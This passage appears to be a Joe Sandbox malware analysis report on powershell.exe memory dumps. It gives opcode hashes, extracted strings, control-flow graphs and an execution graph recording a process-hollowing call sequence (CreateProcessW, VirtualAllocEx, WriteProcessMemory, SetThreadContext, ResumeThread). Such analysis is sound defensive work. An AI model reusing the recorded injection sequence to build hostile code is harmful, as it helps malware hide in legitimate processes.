                                                                                                                                                                                                              • Source File: 00000004.00000002.1766813169.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: ae2bc5b62c077f88fde41912d4464a611954b598f3c5b46b7cf2045f6df306c0
                                                                                                                                                                                                              • Instruction ID: 26c7f100acd8ee47171c21fffec1a40ee599f17882b6eb9110eabb2428141db5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae2bc5b62c077f88fde41912d4464a611954b598f3c5b46b7cf2045f6df306c0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F041E4F4A14217CBDB30CB248901BEB7BA2AF81254F5584AAD6049B391D771DD82CB71
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.1762077583.0000000002E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E7D000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_2e7d000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 6d657b0f1c7bd67e8ee7062b216725ca88d9fbd444cb3f971175a540d36a8c7c
                                                                                                                                                                                                              • Instruction ID: 7aee574f566ac847e010cc90fc5c887b3eda82bb0c73742985a23c478011df35
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d657b0f1c7bd67e8ee7062b216725ca88d9fbd444cb3f971175a540d36a8c7c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5201296204E3C09ED7128B258C94B52BFB4DF53228F1DC1DBD9888F1A3C3695849C772
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.1762077583.0000000002E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E7D000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_2e7d000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 90a932e3a28c3e8f251d7135e8f03ed7af9826966ad26d58f093b08a1802f868
                                                                                                                                                                                                              • Instruction ID: 7393ed8b24e0d30fe100b6fb39a5f432941ebf11626eb4249a903bb5450fea42
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 90a932e3a28c3e8f251d7135e8f03ed7af9826966ad26d58f093b08a1802f868
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC01F2720483409AE7208A29CC84BA7BFD8DF51339F08E42AED084B286C7789842C7B1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.1766813169.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                                                                                                                                                              • API String ID: 0-1608119003
                                                                                                                                                                                                              • Opcode ID: f5c8f74b5068b2d6bf1b326f833d51e2d69417c037274a114642278a886c2243
                                                                                                                                                                                                              • Instruction ID: 27cf313c68855fdf67fc8b9ddac0a0903900b8562a10bc84f35a414f7f449124
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f5c8f74b5068b2d6bf1b326f833d51e2d69417c037274a114642278a886c2243
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CFF106B1B0425A8FDB249B6888207EBBBE6AF96311F14886FD405CB351DB31DD46C7E1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.1766813169.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                                                              • API String ID: 0-1420252700
                                                                                                                                                                                                              • Opcode ID: 36bc1393c8c89425878e3cf52d6a4c1314dc277d35edb10c083855cb32de8fd4
                                                                                                                                                                                                              • Instruction ID: 19cd241d7ddefe0c9627fccbdaedad0568931692bbeab2ef4bccf1077c56defe
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 36bc1393c8c89425878e3cf52d6a4c1314dc277d35edb10c083855cb32de8fd4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 018102B1B04215CFCB258F6AC8046EABBF2EF8A211F1484ABD459CB351DB31DC49C7A1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.1766813169.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                                                              • API String ID: 0-2125118731
                                                                                                                                                                                                              • Opcode ID: 74f8fd8ed7c7eee1afc6c83084d4bd02aa45bb905e6b6350c4c9c04e4201aebb
                                                                                                                                                                                                              • Instruction ID: dd7e1da9bc732705cfc14b2cca47044fd03efc31116d6827f0550a6965af8cb2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 74f8fd8ed7c7eee1afc6c83084d4bd02aa45bb905e6b6350c4c9c04e4201aebb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C52137F171031AABDB349D6B8841BF7AADADBC4711F61882B9509CB3C1DD31DC468271
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.1766813169.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                                                                                              • API String ID: 0-2049395529
                                                                                                                                                                                                              • Opcode ID: e5b01c90f63a220075e5b91439999cdc78fa5edc229d95f2363bda773894b13f
                                                                                                                                                                                                              • Instruction ID: 94c654c17414613d6958b6f1b4e1c5cc2ffbc050cc53c4fba7cca628837276c9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e5b01c90f63a220075e5b91439999cdc78fa5edc229d95f2363bda773894b13f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6601DB71B093958FC72A16382C341976FB26FC261276989DBC080DF26BCE254C4A83A7

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:7.7%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                              Signature Coverage:42.6%
                                                                                                                                                                                                              Total number of Nodes:61
                                                                                                                                                                                                              Total number of Limit Nodes:18
                                                                                                                                                                                                              execution_graph 10351 42087b7 10352 420878e 10351->10352 10353 4208874 10352->10353 10356 420ba80 10352->10356 10354 4208902 10357 420ba9f 10356->10357 10358 420baa6 10356->10358 10357->10354 10358->10357 10361 420bf7e 10358->10361 10383 420ba80 8 API calls 10358->10383 10384 420bfe0 10358->10384 10359 420bf8c 10359->10354 10360 420cd15 CreateProcessW 10363 420cd89 10360->10363 10361->10359 10367 420c8d3 10361->10367 10407 42077b4 10361->10407 10364 420c169 10365 42077c0 Wow64SetThreadContext 10364->10365 10364->10367 10366 420c24a 10365->10366 10366->10367 10368 420c3ec VirtualAllocEx 10366->10368 10376 420c8ee 10366->10376 10367->10360 10367->10376 10369 420c435 10368->10369 10369->10367 10371 420c4e2 VirtualAllocEx 10369->10371 10372 420c529 10369->10372 10370 42077d8 WriteProcessMemory 10373 420c573 10370->10373 10371->10372 10372->10367 10372->10370 10372->10376 10373->10367 10374 420c77f 10373->10374 10373->10376 10380 42077d8 WriteProcessMemory 10373->10380 10374->10367 10375 42077d8 WriteProcessMemory 10374->10375 10377 420c7c7 10375->10377 10376->10354 10377->10367 10377->10376 10378 42077e4 Wow64SetThreadContext 10377->10378 10379 420c87e 10378->10379 10379->10367 10379->10376 10381 420c893 ResumeThread 10379->10381 10380->10373 10381->10367 10383->10358 10386 420c062 10384->10386 10385 420cd15 CreateProcessW 10388 420cd89 10385->10388 10387 42077b4 CreateProcessW 10386->10387 10392 420c8d3 10386->10392 10389 420c169 10387->10389 10389->10392 10411 42077c0 10389->10411 10391 420c24a 10391->10392 10393 420c3ec VirtualAllocEx 10391->10393 10401 420c8ee 10391->10401 10392->10385 10392->10401 10394 420c435 10393->10394 10394->10392 10396 420c4e2 VirtualAllocEx 10394->10396 10397 420c529 10394->10397 10396->10397 10397->10392 10397->10401 10415 42077d8 10397->10415 10398 420c573 10398->10392 10399 420c77f 10398->10399 10398->10401 10405 42077d8 WriteProcessMemory 10398->10405 10399->10392 10400 42077d8 WriteProcessMemory 10399->10400 10402 420c7c7 10400->10402 10401->10358 10402->10392 10402->10401 10419 42077e4 10402->10419 10405->10398 10406 420c893 ResumeThread 10406->10392 10408 420cc30 CreateProcessW 10407->10408 10410 420cd89 10408->10410 10412 420ce70 Wow64SetThreadContext 10411->10412 10414 420ceea 10412->10414 10414->10391 10416 420d3e8 WriteProcessMemory 10415->10416 10418 420d473 10416->10418 10418->10398 10420 420ce70 Wow64SetThreadContext 10419->10420 10422 420c87e 10420->10422 10422->10392 10422->10401 10422->10406
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1939789425.0000000004200000.00000040.00000800.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_4200000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: Xbq$$^q
                                                                                                                                                                                                              • API String ID: 0-1593437937
                                                                                                                                                                                                              • Opcode ID: c9721f2e71647c1c5835f81ba8dbecc0e8343654597ccec4b9cad3b544093fdb
                                                                                                                                                                                                              • Instruction ID: 859cc2269fa519581dc662961310159636a1406c27f9f219845548fcb40b5c91
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c9721f2e71647c1c5835f81ba8dbecc0e8343654597ccec4b9cad3b544093fdb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44827F70B1021ACFDB28DF65C9447AABBF2BB84314F14C6A9D4599B292DB70F981CF50

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1548 4207c48-4207c7d 1550 4207c86 1548->1550 1551 4207c7f-4207c84 1548->1551 1552 4207c8d-4207c91 1550->1552 1551->1552 1553 4207ca3-4207cbc 1552->1553 1554 4207c93-4207ca1 1552->1554 1559 4207cc7-4207cc9 1553->1559 1560 4207cbe-4207cc5 1553->1560 1557 4207cdc-4207cf9 1554->1557 1565 4207d02 1557->1565 1566 4207cfb-4207d00 1557->1566 1562 4207ccc-4207cd0 1559->1562 1560->1562 1562->1557 1563 4207cd2-4207cd9 1562->1563 1567 4207d09-4207d0d 1565->1567 1566->1567 1568 4207d13-4208104 call 42074b4 call 42074c4 call 42074d4 1567->1568 1569 420829c-42082b9 1567->1569 1774 4208121-420812f 1568->1774 1775 4208106-420811f 1568->1775 1576 42082cb 1569->1576 1577 42082bb-42082c0 1569->1577 1579 42082d2-42082d6 1576->1579 1577->1579 1580 42082dc-4208319 1579->1580 1581 420878e-42087ae 1579->1581 1601 4208322 1580->1601 1602 420831b-4208320 1580->1602 1588 42087c0 1581->1588 1589 42087b0-42087b5 1581->1589 1591 42087c7-42087cb 1588->1591 1589->1591 1594 42087d9-4208824 call 4204434 call 4207838 1591->1594 1595 42087cd-42087d0 1591->1595 1636 4208829-4208830 call 4207848 1594->1636 1595->1594 1604 4208329-420832d 1601->1604 1602->1604 1607 4208333-42084c3 call 4206874 1604->1607 1608 42084c8-42086d2 call 42074b4 call 42074c4 call 42074d4 1604->1608 1607->1608 1734 42086d4-42086f3 1608->1734 1735 42086f5-4208709 1608->1735 1641 4208835-420885e 1636->1641 1654 4208860-4208865 1641->1654 1655 4208867 1641->1655 1657 420886e-4208872 1654->1657 1655->1657 1660 42088c0-42088f1 1657->1660 1661 4208874-42088bd 1657->1661 1681 42088f8-42088fc call 420ba80 1660->1681 1686 4208902-4208909 1681->1686 1737 420870f-4208728 1734->1737 1735->1737 1738 4208736-4208763 1737->1738 1739 420872a-4208730 1737->1739 1744 4208765-420876d 1738->1744 1745 420876f 1738->1745 1739->1738 1746 4208779-4208780 1744->1746 1745->1746 1748 4208782 1746->1748 1749 420878b-420878c 1746->1749 1748->1749 1749->1581 1776 4208135-420814b 1774->1776 1775->1776 1777 420814d-4208159 1776->1777 1778 420815f-4208271 1776->1778 1777->1778 1796 4208273-420827b 1778->1796 1797 420827d 1778->1797 1798 4208287-420828e 1796->1798 1797->1798 1799 4208290 1798->1799 1800 4208299 1798->1800 1799->1800 1800->1569
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1939789425.0000000004200000.00000040.00000800.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_4200000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 1cbe153bc1c86812cf8e54c7f54bf5126ab2209e5907ce959717ef3a550e06af
                                                                                                                                                                                                              • Instruction ID: a3aacf40efefe14c3f2244a492b714593bac589ba9970c270ec377745a17e7d2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1cbe153bc1c86812cf8e54c7f54bf5126ab2209e5907ce959717ef3a550e06af
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 75720674B112148FDB54AFB4E8587AD7BF2AF88301F1081A9DA4AA3391DF345D82CB61

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 0 70a0978-70a099b 1 70a09a1-70a09a6 0->1 2 70a0b76-70a0b7c 0->2 3 70a09a8-70a09ae 1->3 4 70a09be-70a09c2 1->4 12 70a0b7e 2->12 13 70a0b61-70a0b73 2->13 5 70a09b2-70a09bc 3->5 6 70a09b0 3->6 7 70a09c8-70a09cc 4->7 8 70a0b23-70a0b2d 4->8 5->4 6->4 10 70a09ce-70a09dd 7->10 11 70a09df 7->11 14 70a0b3b-70a0b41 8->14 15 70a0b2f-70a0b38 8->15 16 70a09e1-70a09e3 10->16 11->16 17 70a0b82-70a0b84 12->17 18 70a0b80-70a0b81 12->18 19 70a0b43-70a0b45 14->19 20 70a0b47-70a0b53 14->20 16->8 23 70a09e9-70a0a09 16->23 24 70a0b91-70a0bbb 17->24 25 70a0b86-70a0b90 17->25 18->17 26 70a0b55-70a0b5e 19->26 20->26 54 70a0a0b-70a0a26 23->54 55 70a0a28 23->55 28 70a0d12-70a0d18 24->28 29 70a0bc1-70a0bc6 24->29 25->24 27 70a0bf8 25->27 26->13 32 70a0bfc-70a0bfe 27->32 46 70a0d1a 28->46 47 70a0cfd-70a0d0f 28->47 34 70a0bc8-70a0bce 29->34 35 70a0bde-70a0be2 29->35 37 70a0cbf-70a0cc9 32->37 38 70a0c04-70a0c08 32->38 40 70a0bd2-70a0bdc 34->40 41 70a0bd0 34->41 36 70a0be8-70a0bea 35->36 35->37 42 70a0bfa 36->42 43 70a0bec-70a0bf5 36->43 48 70a0ccb-70a0cd4 37->48 49 70a0cd7-70a0cdd 37->49 44 70a0c0a-70a0c26 38->44 45 70a0c28 38->45 40->35 41->35 42->32 43->27 58 70a0c2a-70a0c2c 44->58 45->58 52 70a0d1e-70a0d5e 46->52 53 70a0d1c 46->53 56 70a0cdf-70a0ce1 49->56 57 70a0ce3-70a0cef 49->57 62 70a0ecb-70a0ed6 52->62 63 70a0d64-70a0d69 52->63 53->52 64 70a0a2a-70a0a2c 54->64 55->64 65 70a0cf1-70a0cfb 56->65 57->65 58->37 59 70a0c32-70a0c45 58->59 94 70a0c4b-70a0c4d 59->94 87 70a0eda-70a0efd 62->87 88 70a0ed8 62->88 68 70a0d6b-70a0d71 63->68 69 70a0d81-70a0d85 63->69 64->8 67 70a0a32-70a0a34 64->67 65->47 74 70a0a36-70a0a42 67->74 75 70a0a44 67->75 71 70a0d73 68->71 72 70a0d75-70a0d7f 68->72 77 70a0e7a-70a0e84 69->77 78 70a0d8b-70a0d8d 69->78 71->69 72->69 84 70a0a46-70a0a48 74->84 75->84 81 70a0e92-70a0e98 77->81 82 70a0e86-70a0e8f 77->82 85 70a0d8f-70a0d9b 78->85 86 70a0d9d 78->86 91 70a0e9a-70a0e9c 81->91 92 70a0e9e-70a0eaa 81->92 84->8 95 70a0a4e-70a0a6e 84->95 96 70a0d9f-70a0da1 85->96 86->96 89 70a0eff-70a0f0b 87->89 90 70a0f0d 87->90 88->87 97 70a0f0f-70a0f11 89->97 90->97 98 70a0eac-70a0ec8 91->98 92->98 99 70a0c4f-70a0c55 94->99 100 70a0c65-70a0cbc 94->100 123 70a0a70-70a0a76 95->123 124 70a0a86-70a0a8a 95->124 96->77 101 70a0da7-70a0da9 96->101 102 70a0f5d-70a0f67 97->102 103 70a0f13-70a0f19 97->103 105 70a0c59-70a0c5b 99->105 106 70a0c57 99->106 109 70a0dab-70a0db7 101->109 110 70a0db9 101->110 115 70a0f69-70a0f6f 102->115 116 70a0f72-70a0f78 102->116 111 70a0f1b-70a0f1d 103->111 112 70a0f27-70a0f44 103->112 105->100 106->100 114 70a0dbb-70a0dbd 109->114 110->114 111->112 131 70a0faa-70a0faf 112->131 132 70a0f46-70a0f57 112->132 114->77 118 70a0dc3-70a0dc5 114->118 119 70a0f7a-70a0f7c 116->119 120 70a0f7e-70a0f8a 116->120 125 70a0ddf-70a0de3 118->125 126 70a0dc7-70a0dcd 118->126 127 70a0f8c-70a0fa7 119->127 120->127 133 70a0a7a-70a0a7c 123->133 134 70a0a78 123->134 135 70a0a8c-70a0a92 124->135 136 70a0aa4-70a0aa8 124->136 129 70a0dfd-70a0e77 125->129 130 70a0de5-70a0deb 125->130 137 70a0dcf 126->137 138 70a0dd1-70a0ddd 126->138 140 70a0def-70a0dfb 130->140 141 70a0ded 130->141 131->132 132->102 133->124 134->124 142 70a0a96-70a0aa2 135->142 143 70a0a94 135->143 144 70a0aaf-70a0ab1 136->144 137->125 138->125 140->129 141->129 142->136 143->136 149 70a0ac9-70a0b20 144->149 150 70a0ab3-70a0ab9 144->150 153 70a0abb 150->153 154 70a0abd-70a0abf 150->154 153->149 154->149
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1973209244.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_70a0000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                                              • API String ID: 0-2118039658
                                                                                                                                                                                                              • Opcode ID: 6a62bdc4de6e76c447df5455d209f4118b3d7bc796947b86a203fddaf800c1db
                                                                                                                                                                                                              • Instruction ID: b6645478ba60f90cc6b54f4b118683df63274d54351e032a55c2deff40f29b9d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a62bdc4de6e76c447df5455d209f4118b3d7bc796947b86a203fddaf800c1db
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A9F17BB1B1430EAFDB648BB888107BABBE5AF85311F14866BD455CB241FF31D845C7A1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1973209244.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_70a0000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: (o^q$(o^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q
                                                                                                                                                                                                              • API String ID: 0-1590887
                                                                                                                                                                                                              • Opcode ID: 083a43d8c3d3643d9cab47717aa134adcfc5fc2137e375351ee3b28a1737206a
                                                                                                                                                                                                              • Instruction ID: 25cdc1233d135bc925680d8e8d093133ac68c58d0ad7582cbb5071cd2b16a585
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 083a43d8c3d3643d9cab47717aa134adcfc5fc2137e375351ee3b28a1737206a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 641205B1B0421AEFCB548FA8C8147AEBBE2BFC5321F14C67AD5158B251DB31C885CB91

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 351 70a1448-70a146e 352 70a161a-70a1620 351->352 353 70a1474-70a1479 351->353 361 70a1622 352->361 362 70a1605-70a1617 352->362 354 70a147b-70a1481 353->354 355 70a1491-70a1495 353->355 356 70a1483 354->356 357 70a1485-70a148f 354->357 358 70a149b-70a149d 355->358 359 70a15c6-70a15d0 355->359 356->355 357->355 365 70a149f-70a14ab 358->365 366 70a14ad 358->366 363 70a15de-70a15e4 359->363 364 70a15d2-70a15db 359->364 368 70a1626-70a1662 361->368 369 70a1624 361->369 370 70a15ea-70a15f6 363->370 371 70a15e6-70a15e8 363->371 372 70a14af-70a14b1 365->372 366->372 374 70a1668-70a166d 368->374 375 70a1794-70a179c 368->375 369->368 376 70a15f8-70a1602 370->376 371->376 372->359 373 70a14b7-70a14bb 372->373 378 70a14ce 373->378 379 70a14bd-70a14cc 373->379 380 70a166f-70a1675 374->380 381 70a1685-70a1689 374->381 393 70a179e 375->393 394 70a1781-70a1791 375->394 376->362 383 70a14d0-70a14d2 378->383 379->383 384 70a1679-70a1683 380->384 385 70a1677 380->385 387 70a168f-70a1691 381->387 388 70a1746-70a1750 381->388 383->359 390 70a14d8-70a14da 383->390 384->381 385->381 391 70a1693-70a169f 387->391 392 70a16a1 387->392 395 70a175d-70a1763 388->395 396 70a1752-70a175a 388->396 399 70a14ea 390->399 400 70a14dc-70a14e8 390->400 402 70a16a3-70a16a5 391->402 392->402 403 70a17a2-70a17c5 393->403 404 70a17a0 393->404 397 70a1769-70a1775 395->397 398 70a1765-70a1767 395->398 407 70a1777-70a177f 397->407 398->407 408 70a14ec-70a14ee 399->408 400->408 402->388 410 70a16ab-70a16ad 402->410 405 70a17c7-70a17d3 403->405 406 70a17d5 403->406 404->403 411 70a17d7-70a17d9 405->411 406->411 407->394 408->359 413 70a14f4-70a14f6 408->413 414 70a16af-70a16b5 410->414 415 70a16c7-70a16d2 410->415 418 70a17db-70a17fa 411->418 419 70a1847-70a1851 411->419 421 70a14f8-70a14fe 413->421 422 70a1510-70a151b 413->422 416 70a16b9-70a16c5 414->416 417 70a16b7 414->417 434 70a16ea-70a1743 415->434 435 70a16d4-70a16da 415->435 416->415 417->415 448 70a180a 418->448 449 70a17fc-70a1808 418->449 423 70a185a-70a1860 419->423 424 70a1853-70a1857 419->424 426 70a1502-70a150e 421->426 427 70a1500 421->427 428 70a152a-70a1536 422->428 429 70a151d-70a1520 422->429 430 70a1862-70a1864 423->430 431 70a1866-70a1872 423->431 426->422 427->422 436 70a1538-70a153a 428->436 437 70a1544-70a154b 428->437 429->428 439 70a1874-70a1892 430->439 431->439 440 70a16de-70a16e0 435->440 441 70a16dc 435->441 436->437 443 70a1552-70a1554 437->443 440->434 441->434 446 70a156c-70a15c3 443->446 447 70a1556-70a155c 443->447 451 70a155e 447->451 452 70a1560-70a1562 447->452 454 70a180c-70a180e 448->454 449->454 451->446 452->446 454->419 455 70a1810-70a182d 454->455 458 70a182f-70a1841 455->458 459 70a1895-70a189a 455->459 458->419 459->458
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1973209244.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_70a0000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                                              • API String ID: 0-3512890053
                                                                                                                                                                                                              • Opcode ID: 51dbd49b863137160e6cbd0db65c7684b751a128b9d28f5a6251b5fd1e8a0fd9
                                                                                                                                                                                                              • Instruction ID: 449d2b3031345e2c9440f2bb6a86f1de6b4b67840ed0cfeeaab769cf3f2a9b08
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 51dbd49b863137160e6cbd0db65c7684b751a128b9d28f5a6251b5fd1e8a0fd9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72B139B5B0434EEFCF258FB9880077ABBF6AF86211F18856AD855CB241DB31C945C7A1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,00000000,?,?), ref: 0420C41C
                                                                                                                                                                                                              • VirtualAllocEx.KERNEL32(?,00000001,00000000,?,?), ref: 0420C510
                                                                                                                                                                                                                • Part of subcall function 042077D8: WriteProcessMemory.KERNELBASE(?,00000000,00000000,1A24789D,00000000,?,?,?,?,00000000,?,0420C573,?,00000000,?), ref: 0420D464
                                                                                                                                                                                                              • ResumeThread.KERNELBASE(?), ref: 0420C8BA
                                                                                                                                                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 0420CD74
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1939789425.0000000004200000.00000040.00000800.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_4200000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocProcessVirtual$CreateMemoryResumeThreadWrite
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4270437565-0
                                                                                                                                                                                                              • Opcode ID: 4a51a12f84cbdb90b370b5b0a52d4e287633afbf5f0f075fbb63aff26f562cda
                                                                                                                                                                                                              • Instruction ID: c0b7547784d3633852966c344a677f900750ddcdb9a4fbb4e27dea6a9630f50c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a51a12f84cbdb90b370b5b0a52d4e287633afbf5f0f075fbb63aff26f562cda
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E38241B0A1021ACFDB28DF65C954B9AB7F1BF44304F14C6A9D45AA7292DB70BD84CF50

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
